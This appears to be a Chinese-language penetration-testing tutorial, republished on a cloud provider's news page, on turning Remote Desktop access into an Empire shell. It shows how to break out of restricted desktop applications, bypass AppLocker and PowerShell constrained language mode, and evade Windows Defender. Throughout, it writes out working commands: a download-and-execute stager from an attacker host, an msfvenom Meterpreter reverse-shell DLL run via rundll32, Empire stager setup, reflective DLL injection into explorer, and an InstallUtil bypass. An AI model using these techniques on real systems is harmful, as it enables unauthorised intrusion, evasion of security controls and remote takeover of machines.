溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
如何從遠程桌面服務到獲取Empire Shell,相信很多沒有經驗的人對此束手無策,為此本文總結了問題出現的原因和解決方法,通過這篇文章希望你能解決這個問題。
小編將為大家詳細介紹如何在只能訪問遠程桌面服務,且有 AppLocker 保護 PowerShell 處于語言約束模式下獲取目標機器 Empire shell。PowerShell 處于語言約束模式,可以防止大多數PowerShell 技巧的使用。另外,還有 Windows Defender 也是我們必須要面對和解決的問題。
環境要求:
RDS服務器放行80端口出站流量。
.Net v3.5(用于PowerShdll中的dll模式)
注:powershell.exe不是Powershell。它只托管包含PowerShell的程序集并處理I/O.System.Management.Automation.dll
有關更多信息,請參閱文末鏈接內容。
https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/
https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/
在記事本界面菜單欄依次選擇幫助 -> 查看幫助 -> 觸發IE瀏覽器打開
右鍵單擊IE中的任意鏈接 ->將目標另存為 ->在桌面上另存為lol.ps1
點擊IE中的查看下載,按下文件的下拉列表,打開 -> 記事本。只需在文件中寫入powershell.exe并再次保存。
現在,我們再次在IE中右鍵單擊 ->“將目標另存為”。轉到下拉菜單“保存類型”,然后選擇“所有文件”。你已保存的ps1文件將被顯示,你可以選擇“運行 PowerShell”這會彈出一個PowerShell命令提示符。但當前的PowerShell提示符處于語言約束模式。我們可以通過自動化變量$ExecutionContext.SessionState.LanguageMode進行驗證,可以看到結果為ConstrainedLanguage。
首先,我們從https://github.com/p3nt4/PowerShdll下載PowerShdll。然后使用python -m SimpleHTTPServer 80在Kali Web服務器上托管powershdll.dll。接著,在IE中打開http://10.7.253.10/PowerShdll.dll。最后,將其保存為 -> PowerShdll.dll(可以保存在任何文件夾下)。C:\Windows\Tasks文件夾是一個繞過Applocker的好地方,因為該目錄通常被列為白名單。但導航到文件夾也可能受到限制,因此在某些情況下你可能需要將其保存到C:\Users\Username\Desktop(桌面)。
我還不確定如何在Applocked環境中檢查DLL規則。
現在,我們將PowerShell提示符導航至桌面,并使用rundll32來執行dll。
rundll32 .\PowerShdll.dll,main -w
此時,應該會彈出一個新的交互式PowerShell提示符。我們再次通過自動化變量$ExecutionContext.SessionState.LanguageMode進行驗證,可以看到現在已經變為了FullLanguage(完整語言模式)。
直到后來我才發現,其實完全可以省去最后兩步的操作。只需使用set Base64 false和set Outfile shell生成一個Empire stager即可。現在從不受限的PowerShell中,下載shell并將其直接執行到內存中。
IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.18/shell');如果你夠幸運Defender將不會攔截,并且你將獲取到一個Empire shell/agent。
生成一個dll payload:
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.2 lport=8081 -f dll -o msf.dll
設置msf偵聽程序,使用相同的payload,主機和端口。
use multi/handler set host tun0 set port 8081 set payload windows/x64/meterpreter/reverse_tcp exploit
使用之前的IE“另存為”技巧下載msf.dll。
出于某種原因,Windows Defender并沒有攔截我的payload。可能是因為payload的x64簽名尚未被Defender識別為惡意軟件,具體我也不是很清楚。
現在,我們使用rundll32來執行dll。之所以使用rundll32,是因為它是一個不會被Applocker阻止的二進制文件。
rundll32 .\msf.dll,Control_RunDLL
成功獲取到了meterpreter shell。
假設您已建立了一個metasploit會話。
在Empire中,創建一個empire listener 和 stager。最重要的是將Base64設置為false,防止stager調用powershell.exe。由于受限的語言模式,將導致powershell.exe無法在此處運行。
uselistener http set Host 10.7.253.18 set Port 4444 execute back usestager multi/launcher set Base64 false generate
現在在MSF中:
load powershell powershell_shell
在交互式shell中復制粘貼empire listener,在Empire中應該會生成一個agent代理。
繞過 powershell 約束模式和 applocker
以下是一篇關于繞過應用白名單和powershell約束模式的文章,大家可以閱讀下:
https://improsec.com/blog/babushka-dolls-or-how-to-bypass-application-whitelisting-and-constrained-powershell
1.使用windows/hta生成一個listener和hta stager。
2.在visual studio中打開ReflectivePick project。在適當的位置添加hta base64 shell stager,并將dll編譯為ReflectivePick_x64.dll。
3.使用以下PS命令將DLL編碼為base64,并將結果通過管道傳輸到一個文本文件中。
$Content = Get-Content .\ReflectivePick_x64.dll -Encoding Byte $Encoded = [System.Convert]::ToBase64String($Content) $Encoded | Out-File "C:\Windows\Tasks\dll.txt"
4.復制粘貼dll.txt的內容到Invoke-ReflectivePEInjection.ps1的新變量中。
$dllData = "DLLBASE64_GOES_HERE" $ProcId = (Get-Process explorer).Id $Bytes = [System.Convert]::FromBase64String($dllData) Invoke-ReflectivePEInjection -PEBytes $Bytes -ProcId $ProcId
5.使用https://www.base64encode.org/在線Base64編碼整個腳本。打開VS中的Bypass project,并將編碼后的內容復制粘貼到encoded變量中。使用VS將其編譯為Bypass.exe。
6.使用installutil.exe執行bypass.exe
set-location \\tsclient\lkylabs copy-item .\Bypass.exe c:\windows\tasks cd c:\windows\tasks C:\windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\Bypass.exe
看完上述內容,你們掌握如何從遠程桌面服務到獲取Empire Shell的方法了嗎?如果還想學到更多技能或想了解更多相關內容,歡迎關注億速云行業資訊頻道,感謝各位的閱讀!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
